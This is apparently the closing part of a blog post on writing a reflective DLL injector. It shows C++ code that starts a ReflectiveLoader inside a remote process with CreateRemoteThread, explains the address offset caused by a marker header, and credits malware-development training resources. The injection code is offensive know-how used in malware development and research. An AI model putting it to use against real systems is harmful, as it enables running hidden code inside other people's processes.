 //every offset in the PE is SHIFTED BY THE SIZE OF THE HEADER (the egg) I USE TO FIND THE DLL IN MEMORY
 hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)(remotePEBase + (DWORD)(ULONG_PTR)reflectiveLoaderFunc + HEADER_SIZE), NULL, 0, &threadId);
 if (hThread == NULL) {
     cout << "[-] Error while running the remote thread, exiting ... \n";
 }
 else {
     printf("[+] Successfully ran thread with id: %lu\n", threadId);
 }

Something to keep in mind, if you haven’t noticed it in the code: since we wrote a header before the DLL, all the addresses we want to refer to in the remotely allocated memory are shifted by HEADER_SIZE 😇
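
Spelled out as arithmetic, the thread start address is just three numbers added together. A tiny sketch with made-up values (remoteStartAddress is a hypothetical helper, not part of the injector):

```cpp
#include <cassert>   // only needed for the sanity check in the usage note
#include <cstdint>

// Remote memory layout after the write:
//   remoteBase                -> header (egg), headerSize bytes
//   remoteBase + headerSize   -> first byte of the raw DLL ("MZ")
//   ... + rawOffset           -> first instruction of the ReflectiveLoader function
inline uint64_t remoteStartAddress(uint64_t remoteBase, uint32_t headerSize, uint32_t rawOffset) {
    return remoteBase + headerSize + rawOffset;
}
```

For example, if VirtualAllocEx returned 0x20000000000, the header is 8 bytes long and the raw offset of the loader is 0x634, the thread has to start at 0x2000000063C.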

Results

Credits

What I have found really useful during this journey:

  • MaldevAcademy course, and community
  • 0xRick blog, top resource
  • Colleagues that listen to my rants on the way to lunch, and those who like to go on a sabbatical 💞